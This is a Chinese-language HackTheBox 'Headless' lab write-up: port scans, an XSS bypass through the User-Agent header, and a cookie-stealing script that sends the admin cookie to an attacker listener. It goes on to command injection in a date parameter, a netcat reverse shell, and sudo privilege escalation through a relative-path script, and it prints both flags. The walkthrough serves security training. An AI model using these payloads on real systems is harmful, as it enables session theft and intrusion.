HTB:Headless[WriteUP]
目录
连接至HTB服务器并启动靶机
1.Which is the highest open TCP port on the target machine?
2.What is the title of the page that comes up if the site detects an attack in the contact support form?
使用浏览器访问靶机5000端口
5.What is the parameter name on POST requests to /dashboard that has a vulnerability in it?
使用Yakit将此请求包抓取
根据该网页所展示信息可以推测上传的表单应该会存储到靶机服务器
6.What is the name of the user that the web application is running as?
直接利用Yakit的Web Fuzzer模块执行whoami命令
7.Submit the flag located in the dvir user's home directory.
USER_FLAG:826b69de0f383342b6a152920c36348a
8.What is the full path to the script that dvir can run as any user without a password?
9.syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path?
10.Submit the flag located in the root user's home directory.
ROOT_FLAG:5ee60636b53a9eaea6a7b81fd2bef87a
连接至HTB服务器并启动靶机
靶机IP:10.10.11.8
分配IP:10.10.16.8
1.Which is the highest open TCP port on the target machine?
使用nmap对靶机全端口进行扫描
nmap -p- --min-rate=1500 -T4 -sS -Pn 10.10.11.8┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T4 -sS -Pn 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 04:57 EDT
Warning: 10.10.11.8 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.8
Host is up (7.5s latency).
Not shown: 51645 closed tcp ports (reset), 13888 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnpNmap done: 1 IP address (1 host up) scanned in 111.90 seconds
由扫描结果可见,靶机开放的最高端口号为:5000
2.What is the title of the page that comes up if the site detects an attack in the contact support form?
使用nmap对靶机22、5050端口进行脚本、服务信息扫描
nmap -p22,5000 -sCV 10.10.11.8┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p22,5000 -sCV 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-21 05:01 EDT
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 05:03 (0:00:52 remaining)
Nmap scan report for 10.10.11.8
Host is up (0.082s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.2.2 Python/3.11.2
| Date: Mon, 21 Oct 2024 08:49:30 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 2799
| Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Under Construction</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f7f7f7;
| margin: 0;
| padding: 0;
| display: flex;
| justify-content: center;
| align-items: center;
| height: 100vh;
| .container {
| text-align: center;
| background-color: #fff;
| border-radius: 10px;
| box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5000-TCP:V=7.94SVN%I=7%D=10/21%Time=6716186F%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,BE1,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/2\.2\.2
SF:\x20Python/3\.11\.2\r\nDate:\x20Mon,\x2021\x20Oct\x202024\x2008:49:30\x
SF:20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length
SF::\x202799\r\nSet-Cookie:\x20is_admin=InVzZXIi\.uAlmXlTvm8vyihjNaPDWnvB_
SF:Zfs;\x20Path=/\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html
SF:\x20lang=\"en\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n
SF:\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-wi
SF:dth,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<title>Under\x20Construc
SF:tion</title>\n\x20\x20\x20\x20<style>\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:body\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:
SF:\x20'Arial',\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20background-color:\x20#f7f7f7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20padding:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20d
SF:isplay:\x20flex;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20justi
SF:fy-content:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0align-items:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20height:\x20100vh;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\.container\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20text-align:\x20center;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20background-color:\x20#fff;\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20border-radius:\x2010px;\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20box-shadow:\x200px\x200px\x2020px\x20rgba\(0,\x2
SF:00,\x200,\x200\.2\);\n\x20\x20\x20\x20\x20")%r(RTSPRequest,16C,"<!DOCTY
SF:PE\x20HTML>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\
SF:x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20res
SF:ponse</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20ver
SF:sion\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error
SF:\x20code\x20explanation:\x20400\x20-\x20Bad\x20request\x20syntax\x20or\
SF:x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.04 seconds
由扫描结果可见,靶机很可能是Debian系统,5000端口托管着HTTP服务器
使用浏览器访问靶机5000端口
我们在Message框下测试插入XSS脚本
成功收到了攻击告警,标题为:Hacking Attempt Detected
3.What is the name of the cookie that is set for a logged in user on the site?
随便编辑一些信息进行发包后使用Yakit抓包
在请求包头处可以看到设置的Cookie名称为:is_admin
4.What is the relative url of the page on Headless that requires authorization to access?
使用ffuf对靶机URL路径进行FUUZ
ffuf -u http://10.10.11.8:5000/FUZZ -w ../dictionary/common.txt
尝试直接使用浏览器访问:http://{TARGET_IP}:5000/dashboard
页面显示未经授权,所以可确定/dashboard需要授权才能访问
5.What is the parameter name on POST requests to /dashboard that has a vulnerability in it?
再次回到support路径下
名称、邮箱地址、电话号这几个随便填写,Message还是填写一个XSS测试样例
使用Yakit将此请求包抓取
将UA也改成:<script>alert(1)</script>
点击发包后,收到JS弹窗,说明靶机只检测和拦截Message栏目下的XSS
所以我们只需要在User-Agent参数再次添加XSS脚本即可实现绕过
根据该网页所展示信息可以推测上传的表单应该会存储到靶机服务器
尝试利用该存储型XSS漏洞,获取所有访问该表单用户的Cookie
<script>var i=new Image(); i.src="http://{NATIVE_IP}:{NATIVE_PORT}/?cookie="+btoa(document.cookie);</script>
本地侧使用nc开启监听
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.19] from (UNKNOWN) [10.10.11.8] 37800
GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA= HTTP/1.1
Host: 10.10.16.19:1425
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:5000/
Connection: keep-alive
成功获取到了管理员的Cookie
cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=使用Base64解码后
cookie=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0利用此Cookie尝试访问/dashboard
点击发包后,剩下的流量自动放行成功进入Administrator Dashboard
单机Generate Report发包,并将请求体中的Cookie再次修改成admin用户的cookie
经过反复测试,在date参数后加上分号并带上命令可以实现命令执行
6.What is the name of the user that the web application is running as?
直接利用Yakit的Web Fuzzer模块执行whoami命令
由回显可知运行当前WebAPP的用户为:dvir
7.Submit the flag located in the dvir user's home directory.
尝试利用nc反弹shell
将payload转换成URL编码
本地nc侧开启监听
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvnp 1425
listening on [any] 1425 ...
点击发送请求
本地nc侧收到回显
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.19] from (UNKNOWN) [10.10.11.8] 55668
whoami
dvir
提升tty
script -c /bin/bash -q /dev/null寻找user_flag位置
find / -name 'user.txt' 2>/dev/null查看user_flag内容
cat /home/dvir/user.txtscript -c /bin/bash -q /dev/null
dvir@headless:~/app$ find / -name 'user.txt' 2>/dev/null
find / -name 'user.txt' 2>/dev/null
/home/dvir/user.txt
dvir@headless:~/app$ cat /home/dvir/user.txt
cat /home/dvir/user.txt
826b69de0f383342b6a152920c36348a
USER_FLAG:826b69de0f383342b6a152920c36348a
8.What is the full path to the script that dvir can run as any user without a password?
查看一下该用户可特权运行的文件
dvir@headless:~/app$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_ptyUser dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
完整路径为:/usr/bin/syscheck
9.syscheck calls other scripts to collect output. What is the name of the script that is called with a relative path?
查看该文件内容:cat /usr/bin/syscheck
#!/bin/bashif [ "$EUID" -ne 0 ]; thenexit 1
filast_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then/usr/bin/echo "Database service is not running. Starting it..."./initdb.sh 2>/dev/null
else/usr/bin/echo "Database service is running."
fiexit 0我们这里关注这一段代码
这段代码的作用是检查名为initdb.sh的进程是否正在运行,如果没有找到这个进程,则输出 “Database service is not running. Starting it...”然后使用相对路径执行initdb.sh脚本
10.Submit the flag located in the root user's home directory.
随便找一个目录创建一个initdb.sh文件
touch initdb.sh在文件中写入创建新Bash的命令
echo -e '#!/bin/bash\n/bin/bash' > initdb.sh赋执行权限
chmod +x initdb.sh直接使用特权运行/usr/bin/syscheck文件
sudo /usr/bin/syscheckdvir@headless:~/app$ echo -e '#!/bin/bash\n/bin/bash' > initdb.sh
echo -e '#!/bin/bash\n/bin/bash' > initdb.sh
dvir@headless:~/app$ cat initdb.sh
cat initdb.sh
#!/bin/bash
/bin/bash
dvir@headless:~/app$ chmod +x initdb.sh
chmod +x initdb.sh
dvir@headless:~/app$ ls -l initdb.sh
ls -l initdb.sh
-rwxr-xr-x 1 dvir dvir 22 Oct 22 15:34 initdb.sh
dvir@headless:~/app$ sudo /usr/bin/syscheck
sudo /usr/bin/syscheck
Last Kernel Modification Time: 01/02/2024 10:05
Available disk space: 2.0G
System load average: 0.00, 0.02, 0.02
Database service is not running. Starting it...
whoami
whoami
root
提升tty
script -c /bin/bash -q /dev/null查找root_flag位置
find / -name 'root.txt'查看root_flag内容
cat /root/root.txtscript -c /bin/bash -q /dev/null
root@headless:/home/dvir/app# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@headless:/home/dvir/app# cat /root/root.txt
cat /root/root.txt
5ee60636b53a9eaea6a7b81fd2bef87a